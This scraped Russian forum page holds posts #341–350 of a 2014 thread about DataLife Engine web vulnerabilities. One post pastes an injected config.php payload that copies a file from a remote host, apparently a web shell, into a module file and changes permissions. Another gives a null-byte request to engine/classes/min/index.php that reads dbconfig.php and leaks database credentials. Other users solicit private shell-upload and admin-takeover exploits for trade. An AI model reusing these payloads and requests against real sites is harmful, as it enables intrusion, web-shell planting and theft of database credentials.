HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #341  
Старый 26.02.2014, 08:13
mironich
Guest
Сообщений: n/a
Провел на форуме:
142623

Репутация: 19
По умолчанию

Donnel, просто запрет скачивания .htaccess не стоит, и поэтому загрузился, а при нормальной настройке сервера .php скрипты выполняются и выводится рез-тат их работы, а не их содержание.
 
Ответить с цитированием

  #342  
Старый 26.02.2014, 13:11
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

Цитата:
Сообщение от Donnel  
Donnel said:
А теперь заклинаю вас: скажите, выставил ли я себя полнейшим нубом?
Да. Всё, что ты выкачал не является php исходниками.

А теперь пара ссылок, чтобы не выглядел в следующий раз так-же.

http://ru.wikipedia.org/wiki/PHP

http://habrahabr.ru/post/143331/
 
Ответить с цитированием

  #343  
Старый 27.02.2014, 20:55
Donnel
Guest
Сообщений: n/a
Провел на форуме:
1897

Репутация: 0
По умолчанию

Цитата:
Сообщение от VY_CMa  
VY_CMa said:
Да. Всё, что ты выкачал не является php исходниками.
А теперь пара ссылок, чтобы не выглядел в следующий раз так-же.
http://ru.wikipedia.org/wiki/PHP
http://habrahabr.ru/post/143331/
Я понял, что php скачать нельзя, но черт подери, я же скачивал admin.php, до-него то я знал путь, .lng файлы и тому подобное. С этим ничего нельзя сделать?
 
Ответить с цитированием

  #344  
Старый 27.02.2014, 21:10
hpol
Guest
Сообщений: n/a
Провел на форуме:
21252

Репутация: 15
По умолчанию

вот недавно нашел в config.php , как юзают ..хз

Код:
Code:
.eval(base64_decode(chmod("engine/modules/", 0777);  chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");  chmod("engine/modules/avatar.class.php", 0404);)),//
 
Ответить с цитированием

  #345  
Старый 03.03.2014, 13:31
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Цитата:
Сообщение от hpol  
hpol said:
вот недавно нашел в config.php , как юзают ..хз
Код:
Code:
.eval(base64_decode(chmod("engine/modules/", 0777);  chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");  chmod("engine/modules/avatar.class.php", 0404);)),//
Записывается это скорее всего из раздела "Настройки". Какое то поле не фильтруется должным образом, пропуская кавычки...

Чтобы ответить точно на вопрос, нужно точно смотреть как выглядит config.php после взлома.
 
Ответить с цитированием

  #346  
Старый 18.03.2014, 17:21
ramauf
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

ахаха ты вы че ламеры вот же

copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");

тут походу шелл лежал, подозреваю, что s = shell
 
Ответить с цитированием

  #347  
Старый 21.03.2014, 14:42
RexelNet
Guest
Сообщений: n/a
Провел на форуме:
6589

Репутация: -5
По умолчанию

ramauf , ты дaлбaёб?

вопрос был изначально не что это ТАМ, а как удалось этот код пропихнуть умник бля...


вопрос актуален, некто не вкурсе как удалось пропихнуть туда этот код ?

если есть приват способы по загрузке шелла/выполнению кода ,либо иные баги по получению админского аккаунта, готов принять в дар, либо обменять на шелл,либо иные варианты..
 
Ответить с цитированием

  #348  
Старый 21.03.2014, 17:43
hpol
Guest
Сообщений: n/a
Провел на форуме:
21252

Репутация: 15
По умолчанию

engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

вот эту тему встречал на нескольких десятых версиях , выдаёт данные от myadmin
 
Ответить с цитированием

  #349  
Старый 22.03.2014, 03:02
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Цитата:
Сообщение от RexelNet  
RexelNet said:
ramauf , ты дaлбaёб?

вопрос был изначально не что это ТАМ, а как удалось этот код пропихнуть умник бля...

вопрос актуален, некто не вкурсе как удалось пропихнуть туда этот код ?

если есть приват способы по загрузке шелла/выполнению кода ,либо иные баги по получению админского аккаунта, готов принять в дар, либо обменять на шелл,либо иные варианты..

в версиях ниже 9.7 можно пропихнуть
 
Ответить с цитированием

  #350  
Старый 26.03.2014, 14:49
Donnel
Guest
Сообщений: n/a
Провел на форуме:
1897

Репутация: 0
По умолчанию

Цитата:
Сообщение от hpol  
hpol said:
engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
вот эту тему встречал на нескольких десятых версиях , выдаёт данные от myadmin
Или тебе повезло, или админ сайта плохо защитил файлы, или мне, наоборот, не везет - у меня не работает.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Сценарии/CMF/СMS 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ